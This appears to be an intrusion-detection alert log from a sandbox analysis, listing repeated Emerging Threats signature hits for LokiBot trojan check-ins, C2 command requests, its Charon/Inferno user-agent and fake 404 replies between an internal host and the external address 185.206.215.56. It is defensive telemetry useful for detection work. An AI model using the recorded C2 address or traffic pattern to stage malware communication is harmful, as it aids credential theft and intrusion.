                                                                                        01/05/21-19:06:48.422139TCP2025483ET TROJAN LokiBot Fake 404 Response8049271185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:48.626007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2025381ET TROJAN LokiBot Checkin4927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.788675TCP2025483ET TROJAN LokiBot Fake 404 Response8049272185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.009732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2025381ET TROJAN LokiBot Checkin4927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.170301TCP2025483ET TROJAN LokiBot Fake 404 Response8049273185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.377604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2025381ET TROJAN LokiBot Checkin4927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.549512TCP2025483ET TROJAN LokiBot Fake 404 Response8049274185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.748267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2025381ET TROJAN LokiBot Checkin4927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.910769TCP2025483ET TROJAN LokiBot Fake 404 Response8049275185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:50.119352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.119352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.119352TCP2025381ET TROJAN LokiBot Checkin4927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.119352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.275711TCP2025483ET TROJAN LokiBot Fake 404 Response8049276185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:50.486914TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.486914TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.486914TCP2025381ET TROJAN LokiBot Checkin4927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.486914TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.662352TCP2025483ET TROJAN LokiBot Fake 404 Response8049277185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:50.870071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.870071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.870071TCP2025381ET TROJAN LokiBot Checkin4927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:50.870071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.028077TCP2025483ET TROJAN LokiBot Fake 404 Response8049278185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:51.234373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.234373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.234373TCP2025381ET TROJAN LokiBot Checkin4927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.234373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.393173TCP2025483ET TROJAN LokiBot Fake 404 Response8049279185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:51.603753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.603753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.603753TCP2025381ET TROJAN LokiBot Checkin4928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.603753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.756889TCP2025483ET TROJAN LokiBot Fake 404 Response8049280185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:51.974612TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.974612TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.974612TCP2025381ET TROJAN LokiBot Checkin4928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:51.974612TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.147882TCP2025483ET TROJAN LokiBot Fake 404 Response8049281185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:52.356383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.356383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.356383TCP2025381ET TROJAN LokiBot Checkin4928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.356383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.526790TCP2025483ET TROJAN LokiBot Fake 404 Response8049282185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:52.728532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.728532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.728532TCP2025381ET TROJAN LokiBot Checkin4928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.728532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:52.923052TCP2025483ET TROJAN LokiBot Fake 404 Response8049283185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:53.137321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.137321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.137321TCP2025381ET TROJAN LokiBot Checkin4928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.137321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.310694TCP2025483ET TROJAN LokiBot Fake 404 Response8049284185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:53.527158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.527158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.527158TCP2025381ET TROJAN LokiBot Checkin4928580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.527158TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.705442TCP2025483ET TROJAN LokiBot Fake 404 Response8049285185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:53.922499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.922499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.922499TCP2025381ET TROJAN LokiBot Checkin4928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.922499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.077631TCP2025483ET TROJAN LokiBot Fake 404 Response8049286185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:54.285753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.285753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.285753TCP2025381ET TROJAN LokiBot Checkin4928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.285753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.453918TCP2025483ET TROJAN LokiBot Fake 404 Response8049287185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:54.662267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.662267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.662267TCP2025381ET TROJAN LokiBot Checkin4928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.662267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.864166TCP2025483ET TROJAN LokiBot Fake 404 Response8049288185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:55.070986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.070986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.070986TCP2025381ET TROJAN LokiBot Checkin4928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.070986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.223019TCP2025483ET TROJAN LokiBot Fake 404 Response8049289185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:55.427131TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.427131TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.427131TCP2025381ET TROJAN LokiBot Checkin4929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.427131TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.590567TCP2025483ET TROJAN LokiBot Fake 404 Response8049290185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:55.812036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.812036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.812036TCP2025381ET TROJAN LokiBot Checkin4929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.812036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.997742TCP2025483ET TROJAN LokiBot Fake 404 Response8049291185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:56.213303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.213303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.213303TCP2025381ET TROJAN LokiBot Checkin4929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.213303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.397187TCP2025483ET TROJAN LokiBot Fake 404 Response8049292185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:56.594263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.594263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.594263TCP2025381ET TROJAN LokiBot Checkin4929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.594263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.764004TCP2025483ET TROJAN LokiBot Fake 404 Response8049293185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:56.973338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.973338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.973338TCP2025381ET TROJAN LokiBot Checkin4929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.973338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.143234TCP2025483ET TROJAN LokiBot Fake 404 Response8049294185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:57.346021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.346021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.346021TCP2025381ET TROJAN LokiBot Checkin4929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.346021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.532123TCP2025483ET TROJAN LokiBot Fake 404 Response8049295185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:57.742988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.742988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.742988TCP2025381ET TROJAN LokiBot Checkin4929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.742988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.910447TCP2025483ET TROJAN LokiBot Fake 404 Response8049296185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:58.107472TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.107472TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.107472TCP2025381ET TROJAN LokiBot Checkin4929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.107472TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.291278TCP2025483ET TROJAN LokiBot Fake 404 Response8049297185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:58.499485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.499485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.499485TCP2025381ET TROJAN LokiBot Checkin4929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.499485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.677455TCP2025483ET TROJAN LokiBot Fake 404 Response8049298185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:58.918368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.918368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.918368TCP2025381ET TROJAN LokiBot Checkin4929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.918368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.104108TCP2025483ET TROJAN LokiBot Fake 404 Response8049299185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:59.313559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.313559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.313559TCP2025381ET TROJAN LokiBot Checkin4930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.313559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.474234TCP2025483ET TROJAN LokiBot Fake 404 Response8049300185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:59.687246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.687246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.687246TCP2025381ET TROJAN LokiBot Checkin4930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.687246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.847928TCP2025483ET TROJAN LokiBot Fake 404 Response8049301185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:00.058160TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.058160TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.058160TCP2025381ET TROJAN LokiBot Checkin4930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.058160TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.228246TCP2025483ET TROJAN LokiBot Fake 404 Response8049302185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:00.450812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.450812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.450812TCP2025381ET TROJAN LokiBot Checkin4930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.450812TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.618919TCP2025483ET TROJAN LokiBot Fake 404 Response8049303185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:00.828363TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.828363TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.828363TCP2025381ET TROJAN LokiBot Checkin4930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.828363TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.993556TCP2025483ET TROJAN LokiBot Fake 404 Response8049304185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:01.210699TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.210699TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.210699TCP2025381ET TROJAN LokiBot Checkin4930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.210699TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.363213TCP2025483ET TROJAN LokiBot Fake 404 Response8049305185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:01.575817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.575817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.575817TCP2025381ET TROJAN LokiBot Checkin4930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.575817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.750904TCP2025483ET TROJAN LokiBot Fake 404 Response8049306185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:01.975553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.975553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.975553TCP2025381ET TROJAN LokiBot Checkin4930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.975553TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.132845TCP2025483ET TROJAN LokiBot Fake 404 Response8049307185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:02.334169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.334169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.334169TCP2025381ET TROJAN LokiBot Checkin4930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.334169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.488881TCP2025483ET TROJAN LokiBot Fake 404 Response8049308185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:02.695433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.695433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.695433TCP2025381ET TROJAN LokiBot Checkin4930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.695433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.863488TCP2025483ET TROJAN LokiBot Fake 404 Response8049309185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:03.081979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.081979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.081979TCP2025381ET TROJAN LokiBot Checkin4931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.081979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.240915TCP2025483ET TROJAN LokiBot Fake 404 Response8049310185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:03.437460TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.437460TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.437460TCP2025381ET TROJAN LokiBot Checkin4931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.437460TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.601073TCP2025483ET TROJAN LokiBot Fake 404 Response8049311185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:03.817487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.817487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.817487TCP2025381ET TROJAN LokiBot Checkin4931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.817487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.979353TCP2025483ET TROJAN LokiBot Fake 404 Response8049312185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.190227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2025381ET TROJAN LokiBot Checkin4931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.351678TCP2025483ET TROJAN LokiBot Fake 404 Response8049313185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.554889TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2025381ET TROJAN LokiBot Checkin4931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.731423TCP2025483ET TROJAN LokiBot Fake 404 Response8049314185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.946051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2025381ET TROJAN LokiBot Checkin4931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.124758TCP2025483ET TROJAN LokiBot Fake 404 Response8049315185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:05.334400TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2025381ET TROJAN LokiBot Checkin4931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931680192.168.2.22185.206.215.56
